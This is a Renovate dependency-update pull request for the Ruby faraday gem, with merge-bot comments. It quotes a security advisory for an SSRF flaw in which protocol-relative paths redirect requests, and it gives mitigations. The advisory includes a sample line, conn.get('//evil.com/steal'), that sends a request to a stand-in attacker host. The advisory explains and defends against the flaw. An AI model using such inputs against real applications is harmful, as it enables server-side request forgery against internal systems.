Update dependency faraday to v2.14.1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
faraday (source, changelog)	2.14.0 → 2.14.1

GitHub Vulnerability Alerts

CVE-2026-25765

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #​1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

---

Release Notes

lostisland/faraday (faraday)

v2.14.1

Compare Source

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @​Copilot in #​1642
• Add RFC document for Options architecture refactoring plan by @​Copilot in #​1644
• Bump actions/checkout from 5 to 6 by @​dependabot[bot] in #​1655
• Explicit top-level namespace reference by @​c960657 in #​1657

New Contributors

• @​Copilot made their first contribution in #​1642

Full Changelog: lostisland/faraday@v2.14.0...v2.14.1

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov-commenter]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 66.90%. Comparing base (f4504a8) to head (c880172).

Additional details and impacted files

@@           Coverage Diff           @@
##           master     #812   +/-   ##
=======================================
  Coverage   66.90%   66.90%           
=======================================
  Files          46       46           
  Lines        1281     1281           
=======================================
  Hits          857      857           
  Misses        424      424           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.

[yegor256]

@rultor please, try to merge, since 13 checks have passed

[rultor]

@rultor please, try to merge, since 13 checks have passed

@yegor256 OK, I'll try to merge now. You can check the progress of the merge here.

[rultor]

@rultor please, try to merge, since 13 checks have passed

@yegor256 Done! FYI, the full log is here (took me 12min).